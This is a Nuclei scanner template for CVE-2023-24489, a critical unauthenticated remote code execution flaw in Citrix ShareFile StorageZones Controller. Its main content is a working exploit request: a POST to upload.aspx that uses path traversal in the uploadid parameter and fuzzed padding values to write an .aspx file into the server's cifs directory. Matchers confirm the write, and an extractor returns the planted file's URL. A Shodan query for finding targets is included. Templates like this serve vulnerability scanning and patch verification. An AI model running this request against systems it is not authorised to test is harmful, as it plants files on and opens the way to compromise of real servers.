id: CVE-2023-24489 info: name: Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution author: DhiyaneshDK,dwisiswant0 severity: critical description: | A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-24489 - https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/ - https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-24489 cwe-id: CWE-284,NVD-CWE-Other epss-score: 0.96908 epss-percentile: 0.99619 cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:* metadata: verified: true max-request: 256 vendor: citrix product: sharefile_storage_zones_controller shodan-query: title:"ShareFile Storage Server" tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz,kev variables: fileName: '{{rand_base(8)}}' http: - raw: - | POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\..\..\..\cifs&filename={{fileName}}.aspx HTTP/1.1 Host: {{Hostname}} <%@ Page Language="C#" Debug="true" Trace="false" %> payloads: padding: helpers/payloads/citrix_paddings.txt threads: 30 stop-at-first-match: true matchers: - type: dsl dsl: - 'body == "ERROR: The method or operation is not implemented."' - 'status_code == 200' condition: and extractors: - type: dsl dsl: - 'BaseURL+ "/cifs/" + fileName + ".aspx"' # digest: 490a00463044022038effde0d34d3e9861c9a26d39f99c3e4c5917836173695abee020f0afd8c28402205013ef0b75edd32470d3e6f24835e6020f7c21cd0e795f351b40f5b862644810:922c64590222798bb761d5b6d8e72950